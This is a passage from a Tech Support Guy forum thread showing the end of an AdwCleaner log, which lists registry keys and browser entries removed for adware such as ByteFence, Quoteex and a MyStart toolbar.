    Deleted HKLM\Software\Wow6432Node\\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
    Deleted HKLM\Software\Wow6432Node\\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
    Deleted HKLM\Software\Wow6432Node\\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
    Deleted HKLM\Software\Wow6432Node\\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\Quoteex.exe
    Deleted HKLM\Software\Wow6432Node\\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Quoteex.exe
    Deleted HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{607B689F-7600-45E4-B8E5-887F72DAB15C}
    Deleted HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A2159D33-3CE2-401B-8967-1B270628A311}
    Deleted HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0D4A4BC-F7CD-436E-B1FA-25637BA0F5BE}
    Deleted HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION|ByteFence.exe
    Deleted HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
    Deleted HKLM\Software\Wow6432Node\mtQuoteex
    Deleted HKLM\Software\Wow6432Node\mystarttb
    Deleted HKLM\Software\foldershare
    Deleted HKLM\System\CurrentControlSet\Services\EventLog\Application\Application Hosting
    Deleted HKU\.DEFAULT\Software\ByteFence
    Deleted HKU\.DEFAULT\Software\Caphyon\Advanced Updater\{F039D4A9-14D3-4425-A4FA-F2F9D5B0E014}
    Deleted HKU\S-1-5-18\Software\ByteFence
    Deleted HKU\S-1-5-18\Software\Caphyon\Advanced Updater\{F039D4A9-14D3-4425-A4FA-F2F9D5B0E014}

    ***** [ Chromium (and derivatives) ] *****

    Deleted MyStart New Tab
    Deleted Search and New Tab by Yahoo

    ***** [ Chromium URLs ] *****

    Deleted Softonic EN

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries cleaned.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs cleaned.


    *************************

    [+] Delete Tracing Keys
    [+] Reset Winsock

    *************************

    AdwCleaner[S00].txt - [9205 octets] - [12/07/2019 19:55:50]
    AdwCleaner[S01].txt - [9266 octets] - [15/07/2019 16:35:27]

    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########
     
  16. Sponsor

As Seen On
As Seen On...

Welcome to Tech Support Guy!

Are you looking for the solution to your computer problem? Join our site today to ask your question. This site is completely free -- paid for by advertisers and donations.

If you're not already familiar with forums, watch our Welcome Guide to get started.

Join over 733,556 other people just like you!

Loading...
Thread Status:
Not open for further replies.

Short URL to this thread: https://techguy.org/1229750

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice